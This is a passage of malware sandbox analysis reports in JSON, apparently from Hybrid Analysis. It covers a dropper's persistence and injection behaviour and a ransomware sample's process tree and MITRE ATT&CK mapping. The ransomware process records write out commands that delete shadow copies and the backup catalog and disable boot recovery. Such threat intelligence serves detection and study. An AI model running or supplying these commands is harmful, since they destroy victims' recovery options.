"System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has a section named \".eh_fram\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004308]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" wrote 16284 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 192)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a
https://hybrid-analysis.com/sample/ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a
Hybrid Analysis - Ransomware
{"size": 27648, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a", "sha256": "ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a", "av_detect": 83, "vx_family": "Ransom.Small.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 10, "total_signatures": 141, "processes": [{"uid": "00000000-00005860", "name": "ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe", "normalized_path": "C:\\ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe", "sha256": "ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a", "av_label": "Generic.Ransom.Small", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00004160", "parentuid": "00000000-00005860", "name": "svchost.exe", "normalized_path": "%APPDATA%\\svchost.exe", "sha256": "ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a", "av_label": "Generic.Ransom.Small", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00005988", "parentuid": "00000000-00004160", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003904", "parentuid": "00000000-00005988", "name": "vssadmin.exe", "normalized_path": "%WINDIR%\\system32\\vssadmin.exe", "command_line": "vssadmin delete shadows /all /quiet", "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"}, {"uid": "00000000-00003644", "parentuid": "00000000-00005988", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\Wbem\\WMIC.exe", "command_line": "wmic shadowcopy delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00004152", "parentuid": "00000000-00004160", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004452", "parentuid": "00000000-00004152", "name": "bcdedit.exe", "normalized_path": "%WINDIR%\\system32\\bcdedit.exe", "command_line": "bcdedit /set {default} bootstatuspolicy ignoreallfailures", "sha256": "e5bc427ba84627fa84861c54044df8ac3c3b3c3ed3d007265c6b18f588d0ca8a"}, {"uid": "00000000-00003324", "parentuid": "00000000-00004152", "name": "bcdedit.exe", "normalized_path": "%WINDIR%\\system32\\bcdedit.exe", "command_line": "bcdedit /set {default} recoveryenabled no", "sha256": "e5bc427ba84627fa84861c54044df8ac3c3b3c3ed3d007265c6b18f588d0ca8a"}, {"uid": "00000000-00001204", "parentuid": "00000000-00004160", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C wbadmin delete catalog -quiet", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003540", "parentuid": "00000000-00001204", "name": "wbadmin.exe", "normalized_path": "%WINDIR%\\system32\\wbadmin.exe", "command_line": "wbadmin delete catalog -quiet", "sha256": "be527c6085cd944097de35b9740fc4dd24d455567bec596e9cc300d70c5a392d"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 1, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Windows Credential Manager", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004", "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Email Collection", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001", "malicious_identifiers_count": 1, "parent": {"technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", 